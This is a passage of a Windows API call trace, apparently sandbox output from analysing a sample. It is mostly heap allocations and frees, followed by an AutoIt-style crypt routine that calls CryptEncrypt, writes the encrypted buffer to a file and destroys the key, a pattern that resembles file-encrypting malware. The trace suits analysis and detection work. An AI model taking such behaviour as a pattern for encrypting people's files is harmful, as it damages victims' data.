hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.289] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.290] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.290] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0103.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0103.292] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 1 [0103.292] TranslateMessage (lpMsg=0x144e6a4) returned 0 [0103.292] DispatchMessageW (lpMsg=0x144e6a4) returned 0x0 [0103.292] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0103.292] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0103.292] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0103.293] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.293] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.293] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0103.293] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0103.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.293] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.293] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.294] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x5d3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x5e0) returned 1 [0103.294] CharLowerBuffW (in: lpsz="byte[1505]", cchLength=0xa | out: lpsz="byte[1505]") returned 0xa [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5e1) returned 0x43e8010 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0103.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x4516010 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x45165f0 [0103.295] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0103.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caf28 [0103.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.295] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e8010*, pdwDataLen=0x144e088*=0x5d3, dwBufLen=0x5e0 | out: pbData=0x43e8010*, pdwDataLen=0x144e088*=0x5e0) returned 1 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0103.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0103.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0103.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0103.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0103.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0103.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0103.296] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.296] WriteFile (in: hFile=0x298, lpBuffer=0x43fd3b8*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x43fd3b8*, lpNumberOfBytesWritten=0x144ea8c*=0x5e0, lpOverlapped=0x0) returned 1 [0103.297] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0103.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0103.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0103.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.298] CryptDestroyKey (hKey=0x41ac700) returned 1 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.298] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.298] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.298] CharUpperBuffW (in: 